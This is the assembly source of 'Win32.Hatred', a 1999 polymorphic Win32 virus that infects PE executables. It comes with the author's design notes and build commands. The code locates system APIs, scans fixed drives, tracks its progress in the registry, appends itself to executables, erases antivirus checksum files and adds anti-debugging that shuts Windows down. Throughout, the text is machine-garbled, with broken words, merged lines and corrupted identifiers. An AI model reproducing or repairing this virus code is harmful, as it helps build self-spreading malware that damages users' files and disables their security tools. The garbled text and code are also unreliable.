Comment $
??????????????????????????????????????????? ??????????????????????????
Win32.Hatred
V.1.0
??????????????????????????????????????????? ??????????????????????????
By Lord Julus
??????????????????????????????????????????? ??????????????????????????
April 1999
??????????????????????????????????????????? ??????????????????????????
Hello Everybody and Welcome to the Source Code of My New Virus.
============================================================================================================================================================================================================= ============
Briefing
============================================================================================================================================================================================================= =============
Virus name - Win32.Hatr Des
Virus Author - Lord Julus
Version - V.1.0
Release Date - 25 April 1999
Platform - Win32, WIN95 / 98, WINNT
Type - Parasiantic Pe Infector, Directory Scanning
Infects - Win32 Portable Exe Files (.exe ,.scr)
Encrypted - YES
Polymorphic - YES (Uses An Enhanced Version of Mof32)
Retrovirus - YES
Anti-debugging - YES
PayLoad - Graphical (Message Box and Screen Fade Out)
WITH PIXEL Blackout; Can Be Stopped By ESC)
============================================================================================================================================================================================================= ============= this Virus Works Kinda Like this Way:
When the Virus Starts, First IT Locates The Following Win32 Module
Bases:
Kernel32.dll
Advapi32.dll
User32.dll
GDI32.DLL
And Their Corresponding API Function Addresses. if this Goal IS
Achieved without any errors, The Virus Checks The System Out and Makes Out
AN Array Containing All Drive Names That Are Fixed Disks, Like this:
"C: /", "D: /", ..., 0FFH
This List will be used in in infection service.
After That, The Virus Checks The Registry for this Key:
"HKEY_CURRENT_USER / CONTROL Panel / Cursors"
If it can be openeded the full folowing name is queried:
"dertah"
IF the value can be retrieved, IT is Decrypted with a Simple XOR
Algorithm and the it is checked to see if it is real a valid path on
The Hard Disk.
If the value cannot be retrieved, or the value retrieved is not a
Valid path on the HDD, THE Virus Initializes The key name with a
Value Equal to the First Entries List ("C: /", for EX.).
After this is done, The scanning procedure is start. The scanning
Procedure Starts Scanning from The Root of The Matching Drive (The Drive
That Was Retrieved from the registry) And Goes All the Way Until It Finds
Out The Directory Specified in The Registry (if The Virus Runs for T
First Time, The First Directory Will Be The Root Itself). from That
Directory on, The Virus Scans The Harddisk for PE Files, Trying to Locate5 PE Files. IF The 5 PE Files Are Not Found On One HDD O ON ONE
Partition, The Scanning Goes on with the next partition or hdd, as they
Are Found in The Drives List. if The Search Reaches The End of Drives
List, But Still 5 PE Files WERE NOT Found, this Means That All Harddisk
Drives and all partition tables were checked overce and all pe files on the
Entire System Are Infected. So, The Virus Resets It's First Path To The
First root, and the scanning process starts from the beginning. To
Prevent A Big System Slowdown Only 90 Directories Are Checked At A Time.
In this Way, As I Tested The Scanning Procedures Many Times, Basically NO
Slowdown is notted .still, All Drives and Partitions Are Scanned and PARTINE
INFECTED.
Once 5 Files Were Found, or More Than 90 Directories WERE Checked,
The Virus Goes Back Into The Registry and Marks Twhere The Last Directory
That Was Checked. this will be used the next time the Virus Starts as the
Starting point for the scanning.
In The Beginning, If The Key INSIDE The Registry Is Not Found, A
Direct Attack Procedure Is Started Which Searches and Infects
FOLLOWING FILES:
CDPlayer.exe
Calc.exe
PBRUSH.EXE
MPlayer.exe
Notepad.exe
Winhlp32.exe
The appending method is the last section increase. The Virus
Attaches Itself to Last Section's RVA Plus It's Virtual Size and Sets The
File Entrypoint to Itself. After Finishing All The Work, The Virus Returns
The Control to The Host Restoring All Registers, Stack and SEH HANDERS.
Each Time One Directory Is Checked for PE Files, All AntiVirus
Checksum Files Found In That Directory Get ERSED. The Virus Avoids To
Infect Files With Certain Names (AV File Names) The PE Files Are Marked AS Infected Like this:
Win32VersionValue IS set to 'h8'
This Virus include a slighty modified version of the mof32 poly
Engine and from My Calcation Only 4 bytes Stay Unencrypted in the Victim
File, Which IS Pretty Cool ...
For the anti-debugging i Have Used Some Apis That Notifies The
Presence of a debugger and the file is automatically closed. I Tried this
Using The Debugger in Visual C And It Works. SHOULD CRASH MANY CODE
Emulators Which Rely On The Use of Win32 Debugging Methods.
This Is Far The Best Virus I Wrote So Far, Probably Due To the Poly
Engine and the Way It Is Spreading, And It Has The Highest Possibility of
Spreading, Being Very Infectious. i Guess Probably this Will Be My Last
Win32 Directory Scanning Virus and My Next Code Will Be a Resident Win32
Virus.
FAREWELL,
???????????????????????????
? Lord Julus - 1999?
???????????????????????????
====== ======= ======
======= With Heart Feel Hatred !!! ======
====== BLACK BLOOD RUNS THROUGH MY VEINS !! =======
====== Hatred !!! HATRED !!! =====
======== ========
===========
(Manowar)
Assemble with: Tasm32-Ml -M Hatred.asm
TLINK32-Tpe -Aa -c Hatred,, IMPORT32.LIB
Pewrsec Hatred.exe
$
[Equates]
;
The Following Equates Are CRUCIAL for the Way this code gets compiled.
You Must Be Warned That Chang's; Code Act Diferently. You Modify Them at your OWN WILL.
;
To Simply Test The Directory Search Capability Set The Value TestOnly
To True and Look in The Registry (No Files Are Searched)
;
To Only Have Infection On Files Like Goat * Set The Value Debug To True
;
T Test the payload of this virus set debug and testonly to true and set
The date to day 07.
TRUE EQU 1;
False EQU 0;
Debug Equ true; if True Only Goat * Files Are Searched
TestOnly Equias; if True Only Dir. Scan and REG. Update
Retro Equ True; Kill AV Files?
.386p; needed stuff
.Model flat, stdcall;
Jumps;
;
EXTRN MessageBoxa: proc;
EXTRN EXTPROCESS: Proc; Externals
EXTRN GETMODULEHANDLEA: PROC
EXTRN GETPROCADDRESS: PROC;
;
. .data;
DB 0;
;
.code;
;
START:;
Pushad; save all
;
JUMP_CODE:;
JMP Decrypt; Call Poly Decryptor
;
Realstart:;
START_OF_CODE:
NOP;
NOP;
POPAD;
Pushad;
Call getdelta; get delta handle
;
Getdelta:;
POP EBP;
Sub ebp, offset getdelta;
MOV [EBP DELTA], EBP; Save Delta for Later
; ---------------------------------;
Lea Eax, [EBP EXCEPTIONEXIT]; Setup a SEH FRAME
Push Eax;
Push DWORD PTR FS: [0];
MOV FS: [0], ESP;
; ---------------------------------;
MOV EAX, [ESP 28H]; First Let's Locate The
Lea EDX, [EBP KERNEL32_NAME]; kernel32 base address
Call Locatekernel32;
JC RETURNTOHOST;
MOV DWORD PTR [EBP K32], EAX; Save IT ...
; ---------------------------------;
LEA EDX, DWORD PTR [EBP GETPROCADDRESS]; THEN LET'S LOCATE
Call LocateGetProcaddress; getProcaddRESS
JC RETURNTOHOST;
; -----------------------------------------------; MOV EBX, EAX; Now Let's Locate All
MOV Eax, DWORD PTR [EBP K32]; The K32 APIS WE NEED
Lea EDI, DWORD PTR [EBP K32_API_NAMES]; FurtHure ...
Lea ESI, DWORD PTR [EBP K32_API_ADDRS];
Call Locateapiaddresses;
JC RETURNTOHOST;
; ---------------------------------;
LEA EDI, DWORD PTR [EBP USER32_NAME]; Locate User32
Call LocateModuleBase; Module Base
JC RETURNTOHOST;
; ---------------------------------;
LEA EDI, DWORD PTR [EBP U32_API_Names]; and the corresp.
LEA ESI, DWORD PTR [EBP U32_API_ADDRS]; API Addresses
Call Locateapiaddresses;
JC RETURNTOHOST;
; ---------------------------------;
IF debug; anti-debugging !!
Else;
Call [EBP _ISDEBUGERPRESENT]; Let's Check IF Our
OR EAX, Eax; Process is Being
JNE Shut_down; debugged.
JMP continuous;
;
Shut_down:;
Push 0; if So, Close Down !!
Push 02h or 04h or 08h or 10h; this doesn't really
Call [EBP _EXITWINDOWSEX]; Close Windoze ...
Endif;
; --------------------------------------------;
Continue_process:;
Lea EDI, DWORD PTR [EBP Advapi32_name]; LOCATE The Advapi32
Call LocateModuleBase; Module Base
JC RETURNTOHOST;
; ---------------------------------;
LEA EDI, DWORD PTR [EBP A32_API_NAMES]; and the corresp.
LEA ESI, DWORD PTR [EBP A32_API_ADDRS]; API Addresses
Call Locateapiaddresses;
JC RETURNTOHOST;
; ---------------------------------;
Lea EDI, DWORD PTR [EBP GDI32_NAME]; Locate GDI32
Call LocateModuleBase; Module Base
JC RETURNTOHOST;
; ---------------------------------;
LEA EDI, DWORD PTR [EBP G32_API_NAMES]; And The Corresp.lea ESI, DWORD PTR [EBP G32_API_ADDRS]; API Addresses
Call Locateapiaddresses;
JC RETURNTOHOST;
; ---------------------------------;
Call Checksystem; Retrive HDD Names
; ---------------------------------;
Lea Eax, [EBP CURDIR]; Save the Current Dir
Push Eax;
PUSH 260;
Call [EBP _GETCURRENTDIRECTORYA];
; ---------------------------------;
Call setInitialkey; edi will point to the the
; -----------------------------------------------; Last Directory checked.
Lea Eax, DWORD PTR [EBP System_Paths]; if The key Didn't exist
Scan_current_path:; it gets created. Then
Mov BL, Byte Ptr [EAX]; We make eax to points
CMP BL, BYTE PTR [EDI]; The Right Drive Letter
JE OK_GO; in The System Paths
Add Eax, 4;
CMP Byte Ptr [EAX], 0FFH;
Je Returntohost;
JMP scan_current_path;
OK_GO:;
; ---------------------------------;
Call LocateNextDirectory; and the we search ...
; ---------------------------------;
Call setsubsequentkey; set the new key
; ---------------------------------;
Lea Eax, [EBP CURDIR]; Restore THE CURRENT DIR
Push Eax;
Call [EBP _SETCURRENTDIRECTORYA];
; ---------------------------------;
Call payload;
; ---------------------------------;
JMP Returntohost; Return to Host
; ---------------------------------;
; ?????????????????????????????????????????? ??????????????????????????
; Locate Kernel32 Base Address?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: EAX = DWORD ON Stack At Startup
Edx = Pointer to Kernel32 Name;
RETURN: EAX = Base Address of kernel32 if SUCCESS
EAX = 0, CF set if fail
Locatekernel32 Proc Near
Pushad; save all registers
Lea EBX, DWORD PTR [EBP TRY_METHOD_2_ERROR]; First Set Up A SEH
Push Ebx; Frame So That IF
Push DWORD PTR FS: [0]; First Method Crashes
MOV FS: [0], ESP; We Well Find Ourslves
; in the second method
Locateloop:;
CMP DWORD PTR [EAX 0B4H], Eax; First Method Looks For
JE FOUND_K32_KILL_SEH; THE K32 by Checking FOR
Dec EQUAL DWORD AT 0B4
CMP EAX, 40000000H;
JBE TRY_METHOD_2;
JMP locateloop;
;
Found_k32_kill_seh:; if we found it, then w
POP DWORD PTR FS: [0]; Must Destroy Temp
Add ESP, 4; SEH FRAME
MOV DR0, EAX; Save K32 Base In DR0
JMP Found_K32;
;
TRY_METHOD_2_ERROR:; if The first method Gave
MOV ESP, [ESP 8]; and Exception Error WE
Must restore the stack
TRY_METHOD_2:;
POP DWORD PTR FS: [0]; Restore the SEH State
Add ESP, 4;
Popad; restore registers and
Pushad; Save the Again
And Go ON W / Method TWO
MOV EBX, DWORD PTR [EBP ImageBase]; Now Put ImageBase In EBX
MOV ESI, EBX;
CMP Word PTR [ESI], 'ZM'; Check if IT IS AN EXE
JNE NOTFOUND_K32;
MOV ESI, DWORD PTR [ESI.MZ_LFANEW]; GET POITETER TO PE
CMP ESI, 1000H; TOO FAR AWAY?
Jae notfound_k32;
Add ESI, EBX;
CMP Word PTR [ESI], 'EP'; IS IT A PE?
JNE NOTFOUND_K32;
Add ESI, Image_File_Header_Size; Skip HEADER
Mov EDI, DWORD PTR [ESIH_DATADIRECTORY.DE_IMPORT.DD_VIRTUALADDRESS]
Add Edi, EBX; and Get Import RVA
MOV ECX, DWORD PTR [ESI.OH_DATADIRECTORY.DE_IMPORT.DD_SIZE]
Add ECX, EDI; And Import Size
Mov Eax, EDI; Save RVA
;
Locateloop2:;
MOV EDI, DWORD PTR [EDI.ID_NAME]; Get The NameAdd EDI, EBX;
CMP DWORD PTR [EDI], 'NREK'; and Compare To Kern
JE FOUND_THE_KERNEL_IMPORT; if it is not what one
Add eax, image_import_descriptor_size; skip to the next desc.
MOV EDI, EAX;
CMP EDI, ECX; But not beyond the size
Jae notfound_k32; of the descriptor
JMP locateloop2;
;
Found_the_kernel_import:; if we found the kernel
MOV EDI, EAX; Import Descriptor
Mov ESI, DWORD PTR [edi.id_firstthunk]; Take The Pointer To
Add ESI, EBX; Addresses
MOV EDI, DWORD PTR [edi.id_characteristics]; and the pointer to
Add Edi, EBX; Names
;
gha_locate_loop:;
Push Edi; Save Pointer to Names
Mov EDI, DWORD PTR [EDI.TD_ADDRESSOFDATA]; Go to the Actual Thunk
Add Edi, EBX;
Add EDI, 2; and Skip the Hint
;
Push EDI ESI; Save these
Lea ESI, DWORD PTR [EBP GETMODULEHANDLE]; and Point The Name of
MOV ECX, GetModuleHandlelen; GetModuleHandlea
Rep Cmpsb; See if IT Is That One ONE
JE Found_getmoduleHandle; if So ...
POP ESI EDI; OtherWise Restore
;
POP EDI; Restore Arrays Indexes
Add EDI, 4; and Skip to Next
Add ESI, 4;
CMP DWORD PTR [ESI], 0; 0? -> End of Import
JE NOTFOUND_K32;
JMP GHA_LOCATE_LOOP;
;
Found_getmoduleHandle:;
POP ESI; Restore Stack
POP EDI;
POP EDI;
;
Push Edx; Push kernel32 name
MOV ESI, [ESI]; ESI = getModuleHandlea
Call ESI; Address ...
MOV DR0, EAX; DR0 HOLDS K32 BASE !!
OR EAX, EAX;
JZ NOTFOUND_K32;
;
Found_k32:;
POPAD; Restore All Regs and
MOV Eax, DR0; PUT K32 in EAX
CLC; And Mark Success
Ret;
;
NOTFOUND_K32:;
Popad; Restore All Regs
XOR Eax, Eax; And Mark the Failure ...
STC;
Ret;
Locatekernel32 ENDP;
; ?????????????????????????????????????????? ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????I
; ?????????????????????????????????????????? ??????????????????????????
;
Entry: eax = base of kernel32
; Edx = Pointer to getProcaddress Name
;
Return: Eax = address of getProcaddress if SUCCESS
EAX = 0, CF set if fail
LocategetProcaddress proc NEAR;
Pushad;
Mov EBX, EAX; Save the Kernel Base
MOV EDI, EAX;
CMP Word PTR [EDI], 'ZM'; Is IT AN EXE?
JNE NOTFOUNDGPA;
;
MOV EDI, DWORD PTR [EDI.MZ_LFANEW];
CMP EDI, 1000H;
Jae notfoundgpa;
;
Add Edi, EBX;
CMP Word PTR [EDI], 'EP'; IS IT A PE?
JNE NOTFOUNDGPA;
;
Add Edi, Image_File_Header_Size; Skip File HEADER
;
MOV EDI, DWORD PTR [edi.oh_datadirectory.de_export.dd_virtualaddress]
Add EDI, EBX; and Get Export RVA
;
MOV ECX, DWORD PTR [edi.ed_numberofnames]; save number of names, SAVE NUMBER OF NAMES
To Look Into
MOV ESI, DWORD PTR [EDI.ED_ADDRESSOFNAMES]; Get Address of Names
Add ESI, EBX; Align to Base RVA
;
Push EDI; Save Pointer to Export
;
GPA_LOCATE_LOOP:;
MOV EDI, [ESI]; Get One Name Address
Add Edi, Ebx; And Align IT
;
Push ECX ESI; Save Counter and addr.
;
Mov ESI, EDX; Compare to getProcaddress
MOV ECX, GetProcaddresslen
REP CMPSB;
JE FOUNDGPA;
;
POP ESI ECX; Restore Them
;
Add ESI, 4; and get Next Name
Loop GPA_LOCATE_LOOP;
;
NOTFOUNDGPA:; We Didn't Find IT ...
POP EDI;
POPAD;
XOR Eax, Eax; Mark Failure
STC;
Ret;
;
Foundgpa:;
POP ESI ECX; ECX = How Many Did WE
POP EDI; Check from Total, But
SUB ECX, DWORD PTR [edi.ed_numberofnames]; We need the reminder
NEG ECX; of the search
MOV EAX, DWORD PTR [EDI.ED_ADDRESSOFORDINALS]; Get Address of OrdinalsAdd Eax, EBX;
SHL ECX, 1; and Look Using the Index
Add Eax, ECX;
XOR ECX, ECX;
MOV CX, Word PTR [EAX]; Take THE Ordinal
MOV EAX, DWORD PTR [EDI.ED_ADDRESSOFFUNCTIONS]; Take Address of Funcs.
Add Eax, EBX;
SHL ECX, 2; WE LOOK IN A DWORD ARRAY
Add Eax, Ecx; Go to the Function Addr
Mov Eax, [EAX]; Take It's Address
Add Eax, Ebx; And Align It To K32 Base
MOV DR0, EAX; Save IT IN DR0
Popad; Restore All Regs
MOV Eax, DR0; and Mark Success
CLC;
Ret;
LocategetProcAddress Endp;
; ?????????????????????????????????????????? ??????????????????????????
:? General Module Handle Retriving Routine?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: EDI = Pointer to Module Name
;
Return: Eax = Module Base Address IF SUCCESS
EAX = 0, CF set if fail
LocateModuleBase Proc NEAR;
Pushad; save regs
Push Edi; Push Name
Call DWORD PTR [EBP _GETMODULEHANDLEA]; CALL GETMODULEHANDLEA
MOV DR0, EAX;
POPAD;
MOV EAX, DR0;
OR EAX, EAX;
JZ NOTFOUNDMODULE;
CLC; SUCCESS
Ret;
;
NOTFOUNDMODULE:;
STC; Fail
Ret;
LocateModuleBase Endp;
; ?????????????????????????????????????????? ??????????????????????????
;? Geneal API Address Retriving Routine?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: EAX = Base Address of the Module
EBX = Address of getProcAddress
EDI = Pointer TO API Names List (Each Item Null Terminated,
List terminated with 0ffh)
ESI = Pointer to API Addresses List
;
RETURN: CF CLEAR IF SUCCESS AND LIST AT ESI Filled with API Addresses
CF set if fail
Locateapiaddresses Proc Near; Pushad; Save All Regs
Mov Edx, EAX; Save Module Base
LOCATE_APIS_LOOP:
CMP BYTE PTR [EDI], 0FFH; Is IT THE END?
JE Ready_APIS;
;
Push Edx; Save Base
Push EDI; Push API Name
Push Edx; Push Module Base
Call Ebx; Call GetProcaddress
POP EDX; Restore Module Base
OR EAX, EAX; Error?
JE Error_finding_apis;
;
MOV DWORD PTR [ESI], Eax; Save API Address
;
MOV ECX, 100H; Look for the next
MOV Al, 0; API Name
Repunz scaSB;
;
Add ESI, 4; Increment Array
JMP Locate_APIS_LOOP;
;
Ready_apis:;
Popad; all ok!
CLC;
Ret;
;
Error_finding_apis:;
Popad; error here ...
STC;
Ret;
Locateapiaddresses Endp;
; ?????????????????????????????????????????? ??????????????????????????
;? RETURN TO HOST or EXIT from Generation 0?
; ?????????????????????????????????????????? ??????????????????????????
Returntohost proc NEAR;
JMP restore_seh;
;
ExceptionExit:; if we had an error
MOV ESP, [ESP 8]; Must Restore the ESP
;
RESTORE_SEH:;
POP DWORD PTR FS: [0]; And Restore the SEH
Add ESP, 4; Returning to the Host ...
;
Or EBP, EBP; Is IT Generation 0?
JE generation0_exit;
;
POPAD;
;
Push EDI; Temporary Save EDI
DB 0BFH; PUT DELTA IN EDI
Delta DD 0;
;
CMP EDI, 0; First generation?
JE generation0_exit;
MOV EAX, [EDI Offset Oldeip]; Restore Old EIP
Add Eax, [EDI Offset ImageBase]; Align To Memory
Push Eax;
PUSH EBX;
Lea EBX, [EDI Offset Jump]; Calculate The Length of
Sub Eax, EBX; The Jump To The Host
SUB EAX, 4;
MOV DWORD PTR [EDI JUMP], EAX; and store the jump!
POP EBX; Restore The Last Regs ...
POP EAX;
POP EDI;
;
DB 0e9h; this is jmp Original EIP
JUMP DD 0;
;
Generation0_exit:; exit from generation 0push 0;
Call exitprocess;
Returntohost endp;
; ?????????????????????????????????????????? ??????????????????????????
Check the system routines?
; ?????????????????????????????????????????? ??????????????????????????
Checksystem proc NEAR;
Pushad; save regs
LEA ESI, [EBP TEMP_PATH]; Start from "C: /"
Lea EDI, [EBP System_Paths];
;
Retrive_drive_type:;
PUSH ESI;
Call [EBP _GETDRIVETYPEA]; GET Drive Type
;
CMP EAX, 3; Is IT A Fixed DISK?
JNE CHECK_NEXT_PATH;
;
Mov ECX, 4; Save the name in the list
PUSH ESI;
RepNZ MOVSB;
POP ESI;
;
Check_next_path:;
Inc Byte PTR [ESI]; and Go ON Until Z: /
CMP BYTE PTR [ESI], 'Z';
JE finished_paths_search;
JMP Retrive_Drive_type;
;
Finished_paths_search:;
MOV Al, 0FFH; Mark the End
Stosb;
POPAD;
Ret;
CHECKSYSTEM ENDP;
;
System_paths DB 20 DUP (0,0,0,0); Drives Table
Temp_path DB "C: /", 0; First Path
Allfiles DB "*. *", 0; All Files Mask
Dotdot DB "..", 0; Dot Dot
Comment%
; ?????????????????????????????????????????? ??????????????????????????
? • Allocate Memory Area?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: ECX = Size of Memory TO Allocate
;
Return: EAX = New Memory Area Address IF SUCCES
; Eax = 0, CF set if Error
AllocateMemory Proc NEAR;
Push Ecx; Push Ammount of Memo
Push 040h; Fixed Mem Initialized
Call [EBP _GLOBALLOC]; WITH 0
OR EAX, EAX;
JE NO_MEMORY;
;
CLC;
Ret;
;
NO_MEMORY:;
STC;
Ret;
AllocateMemory Endp;
; ?????????????????????????????????????????? ??????????????????????????
;? Free memory isa?
; ?????????????????????????????????????????? ??????????????????????????
; Entry: EAX = Memory Area Handle
;
; RETURN: Nothing
FreeMemory Proc NEAR;
Push Eax; Free the Memory
Call [EBP _GLOBALFREE]; HANDLE
Ret;
FreeMemory Endp;
%
; ?????????????????????????????????????????? ??????????????????????????
;? Locate Needed Directories?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: EDI = Pointer to the Directory to Start from
; Eax = pointer in the system paths
LocatenextDirectory proc NEAR;
Pushad; save regs
;
MOV [EBP SIGNAL], 0;
MOV [EBP FILES], 5; How Many Files?
MOV [EBP ScannedDirs], 90; How Many Directories?
;
Push Eax;
MOV EDI, EAX; Start from ...
;
PARSE_ALL_SYSTEM:;
CMP [EBP SIGNAL], 1;
JE NO_MORE_HANDLES;
Push Edi; Set The Current Dir to The Current Dir To
Call [EBP _SETCURRENTDIRECTORYA]; root of the dir
XOR EBX, EBX; EBX WILL HOLD THE ENTRIES IN
; the depth
Find_first_directory:;
CMP [EBP SIGNAL], 1;
JE NO_FIRST_DIR_FOUND;
LEA EDI, [EBP SearchRec]; Locate The First Directory
Push EDI;
Lea Eax, [EBP AllFiles];
Push Eax;
Call [EBP _FINDFIRSTFILEA];
;
CMP EAX, -1;
JE NO_FIRST_DIR_FOUND; if We Didn't Find ANY ...
;
MOV [EBP HANDLE], EAX; Save the Handle
;
Check_attributes:;
CMP DWORD PTR [EDI.FileAttributes], 10h; Is IT Really A
JNE FIND_NEXT_DIRECTORY; DIRECTORY?
;
Lea eax, [edi.filename]; Get Directory Name and Be Sure
CMP BYTE PTR [EAX], '.'; it isn't "." OR ".."
JE FIND_NEXT_DIRECTORY;
;
Push Eax; set it as the new current
Call [EBP _SETCURRENTDIRECTORYA]; DIRECTORY
;
CMP [EBP SKIP], 1; Do We Need to Check The Path? JE Locate_files;
;
Pushad; if So, Then First Get The Current
Lea EAX, [EBP Offset Tempdir]; Directory and ...
Push Eax;
PUSH 260;
Call [EBP _GETCURRENTDIRECTORYA];
Lea EDI, [EBP OFFSET TEMPDIR];
Lea ESI, [EBP Key_Data]; ... Compare it with the one saved
Mov Eax, ESI; in the registry ...
Push Eax;
Call [EBP _LSTRLEN];
MOV ECX, EAX;
REP CMPSB; if They Are Equal, We Start over
JNE NOT_FOUND_OUR_DIR; from there ...
POPAD;
JMP Locate_files;
;
NOT_FOUND_OUR_DIR:;
POPAD;
JMP STILL_GO;
;
Locate_files:;
MOV [EBP SKIP], 1;
;
IF testOnly;
Else;
Call lockfilesindirectory; ...
Endif;
;
DEC [EBP ScannedDirs]; Do Not Scan More Than 90 DIRS.
JNZ Still_ok; if HDD is Completely Infected The
; Process Would Slow Too Much ...
MOV [EBP SIGNAL], 1;
;
STILL_OK:;
CMP [EBP FILES], 0;
JNE STILL_GO;
;
MOV [EBP SIGNAL], 1;
;
STILL_GO:;
Push DWORD PTR [EBP HANDLE]; Push The Handle
Inc EBX; Increment PUSHED HANDLES NUMBER
JMP Find_First_Directory; and search Again
;
Find_next_directory:;
CMP [EBP SIGNAL], 1;
JE NO_NEXT_DIR_FOUND;
Push EDI; Let's Find The next Directory
Push DWORD PTR [EBP HANDLE];
Call [EBP _FINDNEXTFILEA];
;
Test Eax, EAX;
JZ NO_NEXT_DIR_FOUND; if no next dir ...
;
JMP Check_Attributes; OtherWise Check ...
;
NO_FIRST_DIR_FOUND:; if no new dir wasfact in Where
CMP [EBP SIGNAL], 1;
JE DON_T_CHANGE;
Lea Eax, [EBP DOTDOT]; WE Are Let's Go Back ONE DIR
Push eax; changing to '..'
Call [EBP _SETCURRENTDIRECTORYA];
;
DON_T_CHANGE:;
OR EBX, EBX; Do We Have Any Saved Find
JZ NO_MORE_HANDLES; HANDLES?
Dec Ebx; if we do decrement and pop one
POP DWORD PTR [EBP HANDLE]; of the stack ...
JMP Find_Next_directory; and let's find one more ...
;
NO_NEXT_DIR_FOND:; if no next dir tasn, let's
CMP [EBP SIGNAL], 1;
JE NO_FIRST_DIR_FOUND;
Push DWORD PTR [EBP HANDLE]; Close The Find Handle
Call [EBP _FINDCLOSE];
JMP NO_FIRST_DIR_FOUND;
;
NO_MORE_HANDLES:; When All Handles Are Closed in
POP Eax; The Current Drive Let's Try
Add Eax, 4; The Next ONE ...
Push Eax;
MOV EDI, EAX;
CMP Byte Ptr [EAX], 0FFH; 0FFH Marks The end ...
JNE PARSE_ALL_SYSTEM;
;
CMP [EBP ScannedDirs], 0;
Je quit_this;
;
CMP [EBP Files], 0; IF We Didn't Find All The Files
Je quit_this; during out
Lea EAX, [EBP System_Paths]; The Weme RESET OURSELVES
Push Eax;
Call [EBP _SETCURRENTDIRECTORYA];
;
quit_this:;
POP Eax; Restore All and Go Away ...
POPAD;
Ret;
LocatenextDirectory endp;
;
Locatefilesindirectory proc NEAR;
Pushad;
;
Lea EBX, [EBP FILEMASKS]; Point The Filemasks
PUSH EBX;
;
TRY_NEXT_EXT:;
CMP [EBP FILES], 0;
JE NO_FILES;
Lea Eax, [EBP OFFSET SearchFiles];
Push Eax;
PUSH EBX;
Call [EBP _FINDFIRSTFILEA]; Search First Matching File
;
CMP EAX, -1;
JE NO_FILES;
;
MOV [EBP SearchHandle], EAX; Save IT's Handle
;
Test_file:;
Lea EDI, [EBP SearchFiles];
CMP DWORD PTR [EDI.FileAttributes], 10h; Skip Directories
JE next_file;
;
Lea ESI, [EDI.FileName]; Point the Name
;
Call ValidateFile; Can We Infect IT?
JC NEXT_FILE;
;
Call OpenFile; Open the file !!
;
Next_file:;
CMP [EBP FILES], 0;
JE NO_FILES;
Lea Eax, [EBP SearchFiles]; Push Eax; Search the next file
MOV EAX, [EBP SearchHandle];
Push Eax;
Call [EBP _FINDNEXTFILEA];
;
Test Eax, EAX;
JZ NO_FILES;
JMP Test_file;
;
NO_FILES:;
MOV EAX, [EBP SearchHandle];
Push Eax;
Call [EBP _FINDCLOSE]; Close The Search Handle
;
IF RETRO;
Call EraseChecksums; Kill AV Files?
Endif;
;
POP EBX; LOCATE THE NEXT EXTENSION
Mov EDI, EBX; in the List
MOV ECX, 100;
MOV Al, 0;
Repunz scaSB;
MOV EBX, EDI;
CMP BYTE PTR [EBX], 0FFH;
JE NO_MORE;
PUSH EBX;
JMP TRY_NEXT_EXT; and TRY AGAIN ...
;
NO_MORE:
POPAD;
Ret;
LocateFilesindirectory Endp;
; ?????????????????????????????????????????? ??????????????????????????
Open the file?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: ESI = Pointer to the file name
;
OpenFile Proc Near
Pushad; save registers
MOV [EBP FILEOFS], ESI; Save File Name Offset
Push ESI; SAVE IT
Call [EBP _GETFILEATTRIBUTES]; Get the file attributes
OR EAX, EAX;
JZ Error1;
MOV [EBP FileAttributes], EAX; Save them
;
Error1:;
PUSH 80H;
PUSH ESI;
Call [EBP _SETFILEATTRIBUTES]; set the as normal
;
Push 0; Andokeen the file
PUSH 0;
PUSH 3;
PUSH 0;
PUSH 1;
PUSH 80000000h OR 40000000H;
PUSH ESI;
Call [EBP _CREATEFILEA];
;
CMP EAX, -1; Error?
JE next_file_exit;
;
MOV [EBP HANDLE1], EAX; Save IT's Handle
;
LEA EBX, [EBP Offset Filetime]; Now Save the File Time
PUSH EBX;
Add EBX, 8;
PUSH EBX;
Add EBX, 8;
PUSH EBX;
Push Eax;
Call [EBP _GETFILETIME];
;
Push 0; Get File Size
MOV EAX, [EBP HANDLE1];
Push Eax;
Call [EBP _GETFILESIZE];
;
MOV [EBP FileSize], EAX; Save the FileSize and CalculateAdd Eax, Virussize 500h; ammount of memory needed
;
Push 0; and create a file mapping
Push Eax;
PUSH 0;
PUSH 4;
PUSH 0;
MOV EAX, [EBP HANDLE1];
Push Eax;
Call [EBP _CREATEFILEMAPPINGA];
;
CMP EAX, 0;
JE close_file;
;
MOV [EBP MAPHANDLE], EAX; Save Map Handle
;
MOV EAX, [EBP FileSize];
Add Eax, Virussize 500h;
Push Eax; map the file !!
PUSH 0;
PUSH 0;
PUSH 2;
MOV EAX, [EBP MAPHANDLE];
Push eax;
Call [EBP _MAPVIEWOFFILE];
;
CMP EAX, 0;
JE CLOSE_MAP;
;
Mov ESI, EAX;
MOV [EBP MAPADDRESS], ESI; Save Map Address
;
CMP Word PTR [ESI], 'ZM'; Is IT A MZ EXE FILE?
JNE UNMAP_VIEW;
MOV ESI, DWORD PTR [ESI.MZ_LFANEW]; Get Pe Header Offset
CMP ESI, 1000H; TOO FAR?
Ja unmap_view;
Add ESI, [EBP MAPAddress]; Save Map Address
CMP Word PTR [ESI], 'EP'; Is IT A PE File?
JNE UNMAP_VIEW;
;
MOV DWORD PTR [EBP Peheader], ESI; Save Pe Header Place
Add ESI, Image_File_Header_Size; Go to Optional Header
;
CMP Word Ptr [ESI.OH_WIN32VERSIONVALUE], 'H8'; Already Infected?
JE UNMAP_VIEW;
;
Call infectfile; infect, please!
JC DON_T_MARK;
;
Dec [EBP Files]; Decrease Infected Files
;
MOV Word Ptr [ESI.OH_WIN32VERSIONVALUE], 'H8'; Mark Infection
;
DON_T_MARK:;
Unmap_view:;
MOV EAX, [EBP MAPADDRESS];
Push eax; unmap the view
Call [EBP _UNMAPVIEWOFFILE];
;
CLOSE_MAP:;
MOV EAX, [EBP MAPHANDLE];
Push Eax; Close THE MAP
Call [EBP _CLOSEHANDLE];
;
Close_file:;
Push 0; First Weme Must Set The File
Push 0; Pointer At the end of file
Push DWORD PTR [EBP OFFSET FILESIZE];
Push DWORD PTR [EBP OFFSET HANDLE1]; CALL [EBP _SETFILEPOINTER];
;
Push DWORD PTR [EBP OFFSET HANDLE1]; ... and the mark the end of
Call [EBP _SETENDOFFILE]; File ...
;
